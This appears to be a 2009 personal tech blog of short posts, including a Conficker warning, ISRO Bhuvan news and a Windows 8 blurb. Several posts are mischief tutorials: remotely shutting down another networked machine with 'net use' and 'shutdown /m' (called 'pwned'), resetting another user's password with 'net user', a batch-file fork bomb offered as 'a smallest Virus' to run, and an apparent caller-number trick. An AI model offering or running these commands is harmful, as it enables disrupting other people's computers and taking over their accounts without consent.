Wednesday, August 26, 2009

call any to them own no. try it.

u can call any one by his own no.

firstly u registered himself to Mobivox.com and
then u call

sure that calling no. aur caller no. must be same

Tuesday, August 25, 2009

Protect yourself from Conficker, Dengerous

The Conficker worm is a computer worm that can infect your computer and spread itself to other computers across a network automatically, without human interaction.


for detail visit

http://www.microsoft.com/security/worms/conficker.aspx

this information is useful for all net users

it become more dengerous from today....
so be aware

lalit samar

shutdown through remote tutorial

shutdown /r /t 2 /m \\192.168.10.3

if u get error

then type
net use \\192.168.10.3 /user:administrator

note : u need to know the other terminal password... not only to admin u can shutdown admin righted accounts too

execute previous command within 2 seconds .... pwned

for more

shutdown /i



change password tutorial

type
net user

to see how many user accounts

say example if we ve user named firefox and u r in chrome account Note : u must be ve admin rights and u r not supposed to log into account named firefox
type

net user firefox *

it shows lik

Type a password for the user:
Retype the password to confirm:

ve ur own password

Sunday, August 23, 2009

ISRO’s Bhuvan to beat Google Earth

ISRO is working on an ambitious project called Bhuvan (means Earth), a satellite mapping tool. Bhuvan allows you to zoom far closer than the aerial view from a chopper. If Google Earth shows details upto 200 metres distance and Wikimapia upto 50 metres, Bhuvan will show images upto 10 metres, which means you can easily see details upto a three floor high building and also add information.

Saturday, August 22, 2009

You just try it..a smallest Virus for u

open notepad
copy this code to notepad and save as batch file(.bat).
code:
start
%0
began :s

now run this file

its amazing guys.....

Friday, August 21, 2009

Windows 8 – Life After Windows 7

Windows 8 – Life After Windows 7

Windows 7 not the last dedicated Microsoft OS. ... the company is also looking forward to the next version of Windows. Which is windows 8

Write SQL-like Queries in JavaScript

Developer |
Just as LINQ allows you to write SQL-like queries against objects in .NET, JSINQ facilitates similar queries in JavaScript